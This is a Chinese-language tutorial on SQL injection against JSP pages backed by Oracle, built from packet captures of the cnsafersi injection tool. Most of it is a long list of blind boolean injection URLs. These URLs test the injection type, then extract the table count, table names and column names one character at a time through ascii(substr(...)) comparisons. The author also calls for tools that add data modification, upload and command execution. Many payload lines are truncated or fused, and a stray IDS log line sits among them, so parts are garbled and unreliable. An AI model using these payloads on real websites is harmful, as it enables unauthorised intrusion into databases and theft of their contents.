JSP+ORACLE注入方法整理v1.0
首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具,没有这个工具就没有本文,HEHE,本文是对cnsafersi 注入工具抓包后所获得的数据进行了分析和整理,文章写的比较仓促,有不足之处欢迎同行指正。另外希望有高手开发出功能更加强大的JSP注入程序,cnsafersi目前仅有select的功能,建议新的JSP注入工具中能加入insert/delete/update/backup/上传/执行系统命令等功能,可以参考NBSI的功能进行开发。参考文章:《如何开发CnSaferSI》。首先介绍本文中所使用的工具之JSP注入利器:华仔和他的朋友Hotkey开发的cnsafersi,关于使用方法近期我会写一个详细的使用教程:
下面以上图中的AD表为例来说明JSP+ORACLE注入的过程:
1、 判断注入类型(数字型还是字符型)
字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And user>char(0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And userchar(0) And '1'='1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And userchar(0) And '%25'='
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And userchar(0) And 1 in(1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117)[/url] And userchar(0) And (' ')=('
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]') And userstr(97)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And str(98)http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And str(98)http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]' And userhttp://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117)[/url] And str(98)str(97) And (' ')=('
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url]') And str(98)
出现正常的页面:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And USER>CHR(0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And USER2、 猜解表数量和表名
数据库数量为3:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And UNISTR(1)>UNISTR(0)
以下为猜解数据表数量
数据表第一位为:1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))
数据表第二位为:3
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1)) [url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))
数据表第三位为:1
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))
共有131个数据表,见上图。
以下为猜解表名称:
以下为判断第一个表的长度为:2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第一个表的第一位值为:A
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第一个表AD的第二位值为:D
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第二个表的表ADER的表名长度为:4
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第二个表ADER第一位的值为:A
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第二个表ADER第二位的值为:D
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUMascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第二个表ADER第三位的值为:E
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUMhttp://www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第二个表ADER第四位的值为:R
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
以下为判断第三个表的表名长度为:
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2
3、 猜解列名长度和列名:
a) 以下为猜解字段长度为:2位
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)
列名长度为:10位以上
以下猜解列名的长度的第一位为:1(十位)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))
以下猜解列名长度的第二位为:0(个位)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
Informational 10/12/2005 15:03:25 Suspect event: ICMP Time Exceeded (> 1 for 1 seconds)
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 70>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 67>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 109>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 102>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 99>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 97>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 53>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 51>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 50>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 48=ascii(substr((SELECT COUNT(*) FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))
以下为猜解第一列的第一个字段名CLASS的长度为:5
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 0=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMnvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 5=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
以下为猜解第一列第一个字段的第一位为:C
[url]http://www.test.net/index_kaoyan_view.jsp?id=117[/url] And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUMascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM
以下为猜解第一列第一个字段的第一位为:L
